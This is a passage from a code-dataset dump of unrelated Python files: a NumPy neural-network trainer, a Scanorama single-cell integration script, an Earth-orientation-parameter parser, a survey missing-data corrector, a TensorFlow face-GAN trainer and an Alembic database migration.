# 1. Function to evaluate the total loss on the dataset
def calculate_loss(model, x, y):
    """Mean softmax cross-entropy loss of the 4-layer network on (x, y).

    ``model`` maps 'W0','b0','W1','b1','W2','b2' to numpy arrays; ``y`` holds
    integer class indices, one per row of ``x``.
    """
    num_examples = len(x)
    W0, b0, W1, b1, W2, b2 = model['W0'], model['b0'], model['W1'], model['b1'], model['W2'], model['b2']
    # Forward propagation: two tanh hidden layers, softmax output.
    z0 = x.dot(W0) + b0
    a0 = np.tanh(z0)
    z1 = a0.dot(W1) + b1
    a1 = np.tanh(z1)
    z2 = a1.dot(W2) + b2
    # Numerically stable softmax: subtracting the per-row max leaves the
    # probabilities unchanged but prevents overflow in np.exp.
    z2 = z2 - np.max(z2, axis=1, keepdims=True)
    exp_scores = np.exp(z2)
    probs = exp_scores / np.sum(exp_scores, axis=1, keepdims=True)
    # Cross-entropy of the probability assigned to each true class.
    corect_logprobs = -np.log(probs[range(num_examples), y])
    data_loss = np.sum(corect_logprobs)
    return 1./num_examples * data_loss
# 2. Function to predict the output (40 possible outcomes encoded using 1-hot encoding)
def predict(model, x):
    """Return the predicted class index for each row of ``x``.

    Runs the same forward pass as ``calculate_loss``.  Since softmax is
    monotonic, the argmax of the output scores ``z2`` equals the argmax of
    the probabilities, so the exp/normalisation step is skipped (this also
    avoids potential overflow in np.exp for large scores).
    """
    W0, b0, W1, b1, W2, b2 = model['W0'], model['b0'], model['W1'], model['b1'], model['W2'], model['b2']
    # Forward propagation: two tanh hidden layers, linear output scores.
    z0 = x.dot(W0) + b0
    a0 = np.tanh(z0)
    z1 = a0.dot(W1) + b1
    a1 = np.tanh(z1)
    z2 = a1.dot(W2) + b2
    return np.argmax(z2, axis=1)
# 3. This function learns parameters for the neural network and returns the model.
# - hdim1: Number of nodes in the first hidden layer
# - num_passes: Number of passes through the training data for gradient descent
# - print_loss: If True, print the loss and accuracy every print_interval iterations
# - training: If training=True, both training set and validation set need to be input, i.e. X, Y, X_val and Y_val all need to be fed, and the validation error will be output as well print_loss=True.
def build_model(hdim0,hdim1, X, Y,training=False, X_val=None, Y_val=None, num_passes=2000, print_loss=False, print_interval=10):
    """Train the 4-layer network with full-batch gradient descent; return the model dict.

    Relies on module globals: input_dim/output_dim (layer sizes), epsilon
    (learning rate, set in the hyper-parameter loop) and train_x (see NOTE).
    Class-frequency weights rescale each example's gradient so rare classes
    are not drowned out.  Python 2 code (print statements).
    """
    # NOTE(review): uses the module-global train_x rather than the X
    # parameter -- only correct because the caller always passes X=train_x.
    num_examples=len(train_x) # training set size
    #** Initialize the parameters to random values
    np.random.seed(45)
    W0 = np.random.randn(input_dim, hdim0) / np.sqrt(input_dim)
    b0 = np.zeros((1, hdim0))
    W1 = np.random.randn(hdim0, hdim1) / np.sqrt(hdim0)
    b1 = np.zeros((1, hdim1))
    W2 = np.random.randn(hdim1, output_dim) / np.sqrt(hdim1)
    b2 = np.zeros((1, output_dim))
    # This is what we return at the end
    model = {}
    loss=[]
    loss_val=[]
    accuracy=[]
    accuracy_val=[]
    # Weigh the classes such that misclassifying a less probable outcome gives a larger penalty (by weighing the parameters in obtaining learning rates)
    #from sklearn.utils import class_weight
    #class_weight = class_weight.compute_class_weight('balanced', np.unique(Y), Y)
    weights=np.zeros(40)
    classes=np.unique(Y)
    for i in range(len(classes)):
        weights[classes[i]]=2/float(list(Y).count(classes[i]))
    print "The weights are:"
    print weights
    # Gradient descent. For each batch...
    for i in range(0, num_passes):
        # Forward propagation
        # NOTE(review): biases b0/b1/b2 are NOT added in this forward pass,
        # although they are updated below and ARE used by calculate_loss and
        # predict -- confirm whether this mismatch is intended.
        z0 = X.dot(W0) # num_examples*hdim1
        a0 = np.tanh(z0) # num_examples*hdim1
        z1 = a0.dot(W1) # num_examples*hdim1
        a1 = np.tanh(z1) # num_examples*hdim1
        z2 = a1.dot(W2) # num_examples*output_dim
        exp_scores = np.exp(z2) # num_examples*output_dim
        probs = exp_scores / np.sum(exp_scores, axis=1, keepdims=True) # num_examples*output_dim
        # Backpropagation: softmax + cross-entropy gradient, with each
        # example's contribution scaled by its class weight.
        delta3 = probs # num_examples*output_dim
        delta3[range(num_examples), Y] -= 1
        temp=weights[Y] # num_examples*1
        delta3=delta3*temp[:, np.newaxis]
        dW2 = (a1.T).dot(delta3) # hdim1*output_dim
        db2 = np.sum(delta3, axis=0, keepdims=True) # 1*output_dim
        delta2 = delta3.dot(W2.T) * (1 - np.power(a1, 2)) # num_examples*hdim1
        dW1 = np.dot(a0.T, delta2) # input_dim*hdim1
        db1 = np.sum(delta2, axis=0) # 1*hdim1
        delta1 = delta2.dot(W1.T) * (1 - np.power(a0, 2))
        dW0 = np.dot(X.T, delta1) # input_dim*hdim0
        db0 = np.sum(delta1, axis=0) # 1*hdim0
        # Gradient descent parameter update (epsilon is a module global)
        W0 += -epsilon * dW0
        b0 += -epsilon * db0
        W1 += -epsilon * dW1
        b1 += -epsilon * db1
        W2 += -epsilon * dW2
        b2 += -epsilon * db2
        # Assign new parameters to the model
        model = { 'W0':W0,'b0':b0,'W1': W1, 'b1': b1, 'W2': W2, 'b2': b2}
        # Optionally print the loss and accuracy every print_interval passes
        if print_loss and (i+1) % print_interval == 0:
            loss_current=calculate_loss(model,X,Y)
            print "Loss after iteration %i on training set: %f" %(i, loss_current)
            loss.append(loss_current)
            # Calculate the achieved accuracy on the training set
            y_train=predict(model,X)
            accuracy.append(np.sum(Y==y_train)/float(len(Y)))
            print "Accuracy after iteration %i on training set: %f" %(i, accuracy[-1])
            if training==True:
                loss_current_val=calculate_loss(model,X_val,Y_val)
                print "Loss after iteration %i on validation set: %f" %(i, loss_current_val)
                loss_val.append(loss_current_val)
                # Calculate the achieved accuracy on the validation set
                y_val=predict(model,X_val)
                accuracy_val.append(np.sum(y_val==Y_val)/float(len(Y_val)))
                print "Accuracy after iteration %i on training set: %f" %(i, accuracy[-1])
            if (i+1) % (print_interval*10)==0:
                print "The loss and accuracy in time so far on the training set are:"
                print loss
                print accuracy
                if training==True:
                    print "The loss and accuracy in time so far on the validation set are:"
                    print loss_val
                    print accuracy_val
        if i==num_passes-1:
            print "The final accuracy on the test set is "+str(accuracy[-1])
            if training==True:
                print "The final accuracy on the train set is "+str(accuracy_val[-1])
    return model
import pickle
# Load the input data in the training set
X = np.loadtxt(filename_x, delimiter=",") # load from text
#X = pickle.load(open('x.pkl',"rb"))
X=X.reshape(-1,4096)
# Filter the input values and convert them into binary ones
# NOTE(review): pixels exactly equal to 200 match neither mask and keep
# their raw value -- confirm whether the threshold should be inclusive.
X[X<200]=0
X[X>200]=1
# Load the output results in the training set
# Load the output results in the training set and convert each raw label
# (a product of two digits) to a dense class index 0..39: its position in
# the ascending list of the 40 possible label values.  This reproduces the
# original 80-line if/elif ladder exactly (values 0..18 map to themselves,
# 20 -> 19, 21 -> 20, ... 81 -> 39).
_VALID_LABELS = list(range(19)) + [20, 21, 24, 25, 27, 28, 30, 32, 35, 36,
                                   40, 42, 45, 48, 49, 54, 56, 63, 64, 72, 81]
_LABEL_TO_CLASS = {label: idx for idx, label in enumerate(_VALID_LABELS)}
y = []
with open(filename_y, 'r') as fin:
    for line in fin:
        # Raises KeyError on an unexpected label instead of silently
        # reusing the previous value (the original ladder had no else).
        y.append(_LABEL_TO_CLASS[int(line)])
y = np.array(y)
y.reshape(-1, 1)  # NOTE(review): no-op -- result is discarded; kept for fidelity
Y = y
# Grid search over hidden-layer size and learning rate.  ``time`` is fixed
# at 0, so the validation split is always the first test_size fraction of
# the data (the k-fold loop below is commented out).
num=0
time=0
total_size=len(X)
for hdim0 in hdim0_range: # The number of nodes
    for epsilon in epsilon_range: # learning rate for gradient descent
        #for time in range(5):
        # train_x,train
        num+=1
        test_x=X[int(len(X)*test_size*time):int(len(X)*test_size*(time+1))]
        train_x=X[int(len(X)*test_size*(time+1)):total_size]
        test_y=Y[int(len(X)*test_size*time):int(len(X)*test_size*(time+1))]
        train_y=Y[int(len(X)*test_size*(time+1)):total_size]
        print "Iteration "+str(num)+" starts----------------"
        print "Learning rate is "+str(epsilon)
        print "There are "+str(hdim0)+" neurons in the hidden layer"
        model = build_model(hdim0,hdim1, train_x, train_y, training=True, X_val=test_x, Y_val=test_y, print_loss=True,num_passes=num_passes_current,print_interval=print_interval_current)
| 3.59375 | 4 |
code/1M_mouse_brain/run_scanorama_1M.py | jhu99/vipcca_paper | 0 | 12765046 | import scxx.preprocessing as pp
import scxx.plotting as pl
import scanorama
import os
import numpy as np
import scanpy as sc
from anndata import AnnData
np.random.seed(0)
NAMESPACE = 'mouse_brain'
BATCH_SIZE = 1000
result_dir="./results/1M_mouse_brain/scanorama/"
# One dataset per brain region; the list index doubles as the batch label.
data_names = [
    'data/mouse_brain/nuclei',
    'data/mouse_brain/dropviz/Cerebellum_ALT',
    'data/mouse_brain/dropviz/Cortex_noRep5_FRONTALonly',
    'data/mouse_brain/dropviz/Cortex_noRep5_POSTERIORonly',
    'data/mouse_brain/dropviz/EntoPeduncular',
    'data/mouse_brain/dropviz/GlobusPallidus',
    'data/mouse_brain/dropviz/Hippocampus',
    'data/mouse_brain/dropviz/Striatum',
    'data/mouse_brain/dropviz/SubstantiaNigra',
    'data/mouse_brain/dropviz/Thalamus',
]
import pandas as pd
# Restrict every dataset to the shared gene list used by VIPCCA so all
# batches have matching features.
genelist = pd.read_csv("./data/scanorama_data/data/mouse_brain/genelist_vipcca.txt",header=None,index_col=0).index
datasets=[]
for i in range(len(data_names)):
    name=data_names[i]
    ann = pp.read_sc_data("./data/scanorama_data/"+name+"/data.h5ad",batch_name=str(i))
    ann=ann[:,genelist]
    ann.write("./data/scanorama_data/"+name+"/data_subset.h5ad")
    datasets.append(ann)
# Scanorama batch correction: 16-dimensional integrated embedding plus
# corrected expression matrices, one per input dataset.
integrated, corrected = scanorama.correct_scanpy(datasets, return_dimred=True, dimred=16)
scanorama_X=integrated[0]
adata_corrected=corrected[0]
adata_corrected.obs=datasets[0].obs
# Stack the per-dataset embeddings/AnnData objects into one object.
for i in np.arange(1,len(integrated)):
    scanorama_X=np.concatenate([scanorama_X,integrated[i]])
    adata_i=corrected[i]
    adata_i.obs=datasets[i].obs
    adata_corrected=adata_corrected.concatenate(adata_i,index_unique=None)
adata_corrected.raw=adata_corrected.copy()
adata_corrected.X=adata_corrected.X.todense()
adata_corrected.obsm["X_scanorama"]=scanorama_X
adata_corrected.obs_names_make_unique()
# 1,094,150
adata_corrected.write(result_dir+"output.h5ad")
| 2.28125 | 2 |
where/parsers/eop_bulletin_a.py | ingridfausk/where | 16 | 12765047 | <reponame>ingridfausk/where
"""A parser for reading data from EOP files
Description:
------------
Reads data from EOP files.
"""
# Midgard imports
from midgard.dev import plugins
from midgard.math.unit import Unit
from midgard.parsers._parser_line import LineParser
@plugins.register
class EopBulletinAParser(LineParser):
    """Parser for Bulletin A Earth Orientation Parameter (EOP) files.

    Each fixed-width record carries a date/MJD, polar motion (x, y),
    UT1-UTC, LOD and celestial pole offsets (dx, dy) with their formal
    errors, plus Bulletin B values (b_* fields).
    """
    def setup_parser(self):
        # Fixed-width field specification consumed by LineParser:
        # 'delimiter' gives the column widths, 'dtype'/'names' the field
        # types and names ('blank' entries are separator columns).
        return dict(
            delimiter=(
                2,
                2,
                2,
                1,
                8,
                1,
                1,
                1,
                9,
                9,
                1,
                9,
                9,
                2,
                1,
                10,
                10,
                1,
                7,
                7,
                2,
                1,
                1,
                9,
                9,
                1,
                9,
                9,
                10,
                10,
                11,
                10,
                10,
            ),
            dtype="i2, i2, i2, u1, f8, u1, u1, u1, f8, f8, u1, f8, f8, u2, u1, f8,f8, u1, f8,f8, u2,u1,u1,f8,f8,u1,f8,f8,f8,f8,f8,f8,f8",
            names=[
                "year",
                "month",
                "day",
                "blank",
                "mjd",
                "blank",
                "pm_flag",
                "blank",
                "x",
                "x_ferr",
                "blank",
                "y",
                "y_ferr",
                "blank",
                "ut1_utc_flag",
                "ut1_utc",
                "ut1_utc_ferr",
                "blank",
                "lod",
                "lod_ferr",
                "blank",
                "nut_flag",
                "blank",
                "dx",
                "dx_ferr",
                "blank",
                "dy",
                "dy_ferr",
                "b_x",
                "b_y",
                "b_ut1_utc",
                "b_dx",
                "b_dy",
            ],
            autostrip=True,
        )
    def structure_data(self):
        # Convert units in place: LOD from milliseconds to seconds, and the
        # celestial pole offsets from milliarcseconds to arcseconds.
        self._array["lod"] *= Unit.ms2s
        self._array["dx"] *= Unit.milliarcsec2arcsec
        self._array["dy"] *= Unit.milliarcsec2arcsec
        # One entry per epoch, keyed by Modified Julian Date.
        self.data = {
            item["mjd"]: dict(
                x=item["x"],
                y=item["y"],
                ut1_utc=item["ut1_utc"],
                lod=item["lod"],
                dx=item["dx"],
                dy=item["dy"],
                source="bulletin_a",
            )
            for item in self._array
        }
| 2.078125 | 2 |
minos/data_generation/US_missing_deterministic.py | RobertClay/Paper1 | 0 | 12765048 | <gh_stars>0
"""For correcting missing data that is deterministic on other attributes."""
import pandas as pd
import numpy as np
import US_utils
import US_missing_description
def det_missing(data, columns, conditioner, replacer):
    """Replace deterministically-missing values in the given columns.

    For each column, rows whose value is one of the Understanding Society
    missing sentinels AND for which ``conditioner(data)`` is True are handed
    to ``replacer(data, index, column)``, which returns the updated frame.

    Examples
    --------
    data : US data frame
    columns : list of columns to update deterministically
    conditioner : returns True where a person is unemployed, False otherwise
    replacer : returns 0 regardless of other individual attributes

    Parameters
    ----------
    data : pd.DataFrame
        The data to correct.
    columns : list
        Columns to correct data for.
    conditioner, replacer : func
        ``conditioner`` takes the frame and returns a boolean Series selecting
        candidate rows; ``replacer`` decides what the selected missing values
        become (deterministic or based on within/cross individual attributes).

    Returns
    -------
    pd.DataFrame
        The corrected data frame.
    """
    # Sentinel codes appear as ints, strings and float-strings in the raw data.
    sentinel_values = ['-1', '-2', '-7', '-8', '-9',
                       -1, -2, -7, -8, -9,
                       '-1.0', '-2.0', '-7.0', '-8.0', '-9.0']
    for col in columns:
        flagged = data[col].isin(sentinel_values) & conditioner(data)
        data = replacer(data, flagged[flagged].index, col)
    return data
def is_unemployed(data):
    """Boolean mask of rows whose labour_state gives a reason to be out of work.

    Parameters
    ----------
    data : pd.DataFrame
        Frame with a ``labour_state`` column.

    Returns
    -------
    pd.Series
        True where the person is in a non-working labour state.
    """
    # TODO: this condition needs expanding -- it should also check that no
    # other job information is available.  Some students are employed and
    # missing only one of SIC/SOC; those values are truly missing, and this
    # mask would incorrectly wipe their job details.
    non_working = ("Unemployed", "Family Care", "Student", "Sick/Disabled", "Retired")
    return data["labour_state"].isin(non_working)
def force_zero(data, index, column):
    """Set ``column`` to the string "0" for every row label in ``index``.

    Mutates ``data`` in place and returns it, matching the replacer
    signature expected by ``det_missing``.
    """
    data.loc[index, column] = "0"
    return data
def force_nine(data, index, column):
    """Set ``column`` to the string "-10.0" for every row label in ``index``.

    NOTE(review): despite the function name, the value written is "-10.0",
    not a nine -- confirm this is intentional.
    Mutates ``data`` in place and returns it, matching the replacer
    signature expected by ``det_missing``.
    """
    data.loc[index, column] = "-10.0"
    return data
def main():
    """Run the deterministic missing-data correction pipeline end to end.

    Loads the yearly US cohort files, records missingness before and after
    forcing unemployed people's job fields to 0, and saves the corrected data.
    """
    # Load in data.
    years = np.arange(1990, 2019)  # upper bound exclusive: 1990..2018
    file_names = [f"data/raw_US/{item}_US_cohort.csv" for item in years]
    data = US_utils.load_multiple_data(file_names)
    # Table of missing values by row/column before correction.
    before = US_missing_description.missingness_table(data)
    unemployed_columns = ["job_industry",
                          "job_duration_m",
                          "job_duration_y",
                          #"job_sec",
                          "job_occupation"]
    # force unemployed people to have value 0 in unemployed_columns.
    data = det_missing(data, unemployed_columns, is_unemployed, force_zero)
    # table of missing values by row/column after correction.
    after = US_missing_description.missingness_table(data)
    US_utils.save_multiple_files(data, years, 'data/deterministic_US/', "")
    return data, before, after
if __name__ == "__main__":
    data, before, after = main()
share/gan_face/train_gan.py | tomsnail/opencv_tf_py | 0 | 12765049 | #-*- coding:utf-8 -*-
from generate_face import *
from gan_model import ganModel
import tensorflow as tf
if __name__ == '__main__':
    # Hyper-parameters for the face GAN (TensorFlow 1.x graph API).
    hparams = tf.contrib.training.HParams(
        data_root = './../../datas/gan_face/img_align_celeba',
        crop_h = 108, # height after cropping the original image
        crop_w = 108, # width after cropping the original image
        resize_h = 64, # height after resizing the cropped image
        resize_w = 64, # width after resizing the cropped image
        is_crop = True, # whether to crop
        z_dim = 100, # dimension of the random noise z used by the generator
        batch_size = 64, # batch size
        sample_size = 64, # number of images held out as test samples
        output_h = 64, # height of generator output images
        output_w = 64, # width of generator output images
        gf_dim = 64, # depth of the generator's feature maps
        df_dim = 64) # depth of the discriminator's feature maps
    face = generateFace(hparams)
    sample_images,sample_z = face.get_sample(hparams.sample_size)
    # Graph placeholders: real images, noise vector, and a training flag.
    is_training = tf.placeholder(tf.bool,name='is_training')
    images = tf.placeholder(tf.float32, [None,hparams.resize_h,hparams.output_w,3],name='real_images')
    z = tf.placeholder(tf.float32, [None,hparams.z_dim], name='z')
    model = ganModel(hparams)
    g_loss,d_loss,g_vars,d_vars,g_sum,d_sum,G = model.build_model(is_training,images,z)
    d_optim,g_optim = model.optimizer(g_loss,d_loss,g_vars,d_vars)
    saver = tf.train.Saver(tf.global_variables())
    with tf.Session() as sess:
        # Resume from the latest checkpoint if one exists.
        ckpt = tf.train.get_checkpoint_state('./../../datas/model/share/gan_face/')
        if ckpt and tf.train.checkpoint_exists(ckpt.model_checkpoint_path):
            print("Reading model parameters from %s" % ckpt.model_checkpoint_path)
            saver.restore(sess, ckpt.model_checkpoint_path)
        else:
            print("Created model with fresh parameters.")
            sess.run(tf.global_variables_initializer())
        summary_writer = tf.summary.FileWriter("train_gan", sess.graph)
        step = 0
        # NOTE(review): the training loop never terminates on its own; it
        # relies on an external interrupt to stop.
        while True:
            step = model.global_step.eval()
            batch_images,batch_z = face.next_batch(hparams.batch_size)
            #Update D network
            _, summary_str = sess.run([d_optim,d_sum],
                            feed_dict={images:batch_images, z:batch_z, is_training:True})
            summary_writer.add_summary(summary_str,step)
            #Update G network
            _, summary_str = sess.run([g_optim,g_sum],
                            feed_dict={z:batch_z, is_training:True})
            summary_writer.add_summary(summary_str,step)
            d_err = d_loss.eval({images:batch_images, z:batch_z, is_training:False})
            g_err = g_loss.eval({z:batch_z,is_training:False})
            print("step:%d,d_loss:%f,g_loss:%f" % (step,d_err,g_err))
            # Every 1000 steps: render sample images and save a checkpoint.
            if step%1000 == 0:
                samples, d_err, g_err = sess.run([G,d_loss,g_loss],
                                feed_dict={images:sample_images, z:sample_z, is_training:False})
                print("sample step:%d,d_err:%f,g_err:%f" % (step,d_err,g_err))
                save_images(samples,image_manifold_size(samples.shape[0]), './../../datas/train/share/gan_face/samples/train_{:d}.png'.format(step))
                saver.save(sess,"./../../datas/model/share/gan_face/gans.ckpt",global_step = step)
server/kraken/migrations/versions/5b13b262b132_added_repo_changes.py | fossabot/kraken-3 | 66 | 12765050 | <filename>server/kraken/migrations/versions/5b13b262b132_added_repo_changes.py<gh_stars>10-100
"""added repo changes
Revision ID: 5b13b262b132
Revises: <KEY>
Create Date: 2021-04-07 06:02:59.604892
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy import orm
from sqlalchemy.sql import insert
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = '<KEY>'
down_revision = '<KEY>'
branch_labels = None
depends_on = None
def upgrade():
    """Create the repo_changes table and backfill it from legacy JSON columns.

    flows.trigger_data and runs.repo_data used to hold raw JSON; each value
    is copied into its own repo_changes row and linked back via new FK
    columns (trigger_data_id / repo_data_id).
    """
    conn = op.get_bind()
    orm.Session(bind=conn)
    rc_tbl = op.create_table('repo_changes',
    sa.Column('created', sa.DateTime(), nullable=False),
    sa.Column('updated', sa.DateTime(), nullable=False),
    sa.Column('deleted', sa.DateTime(), nullable=True),
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('data', postgresql.JSONB(astext_type=sa.Text()), nullable=False),
    sa.PrimaryKeyConstraint('id')
    )
    # New FK columns pointing at repo_changes.
    op.add_column('flows', sa.Column('trigger_data_id', sa.Integer()))
    op.create_foreign_key('flows_trigger_data_id_fkey', 'flows', 'repo_changes', ['trigger_data_id'], ['id'])
    op.add_column('runs', sa.Column('repo_data_id', sa.Integer()))
    op.create_foreign_key('runs_repo_data_id_fkey', 'runs', 'repo_changes', ['repo_data_id'], ['id'])
    print('updating flows')
    # Copy each flow's trigger_data JSON into its own repo_changes row and
    # link it back; a bare dict is normalised to a one-element list.
    res = conn.execute("SELECT id, created, trigger_data FROM flows WHERE trigger_data IS NOT NULL AND trigger_data::text != 'null'")
    for flow_id, created, d in res.fetchall():
        if isinstance(d, dict):
            d = [d]
        rc = {'created': created, 'updated': created, 'data': d}
        ret = conn.execute(insert(rc_tbl).values(rc).returning(rc_tbl.c.id))
        d_id = ret.fetchone()[0]
        print('flow: %d repo_changes %d' % (flow_id, d_id))
        # IDs are integers from the database, so %d interpolation is safe here.
        conn.execute("UPDATE flows SET trigger_data_id = %d WHERE id = %d" % (d_id, flow_id))
    print('updating runs')
    # Same for runs.repo_data, additionally converting the legacy
    # {url: [commits]} dict shape into the newer list of change dicts
    # (repo / trigger / commits / before / after).
    res = conn.execute("SELECT id, created, repo_data FROM runs WHERE repo_data IS NOT NULL AND repo_data::text != 'null'")
    for run_id, created, d in res.fetchall():
        if isinstance(d, dict):
            new_ds = []
            for url, commits in d.items():
                new_d = {}
                new_d['repo'] = url
                new_d['trigger'] = 'git-push'
                new_commits = []
                for c in commits:
                    nc = dict(id=c['commit'],
                              author=dict(name=c['author'], email=c['email']),
                              timestamp=c['date'],
                              message=c['subject'])
                    new_commits.append(nc)
                new_d['commits'] = new_commits
                # NOTE(review): assumes the legacy commit list is
                # newest-first ('after' = first, 'before' = last) -- confirm.
                new_d['before'] = new_commits[-1]['id']
                new_d['after'] = new_commits[0]['id']
                new_ds.append(new_d)
            d = new_ds
        rc = {'created': created, 'updated': created, 'data': d}
        ret = conn.execute(insert(rc_tbl).values(rc).returning(rc_tbl.c.id))
        d_id = ret.fetchone()[0]
        print('run: %d repo_changes %d' % (run_id, d_id))
        conn.execute("UPDATE runs SET repo_data_id = %d WHERE id = %d" % (d_id, run_id))
    # Legacy JSON columns are deliberately kept for now (drops commented out).
    #op.drop_column('flows', 'trigger_data')
    #op.drop_column('runs', 'repo_data')
def downgrade():
    """Drop the FK columns and the repo_changes table.

    The legacy JSON columns are not restored (the add_column lines remain
    commented out), so a downgrade loses the migrated data's old location.
    """
    # op.add_column('runs', sa.Column('repo_data', postgresql.JSONB(astext_type=sa.Text()), autoincrement=False, nullable=True))
    op.drop_constraint('runs_repo_data_id_fkey', 'runs', type_='foreignkey')
    op.drop_column('runs', 'repo_data_id')
    # op.add_column('flows', sa.Column('trigger_data', postgresql.JSONB(astext_type=sa.Text()), autoincrement=False, nullable=True))
    op.drop_constraint('flows_trigger_data_id_fkey', 'flows', type_='foreignkey')
    op.drop_column('flows', 'trigger_data_id')
    op.drop_table('repo_changes')
| 1.757813 | 2 |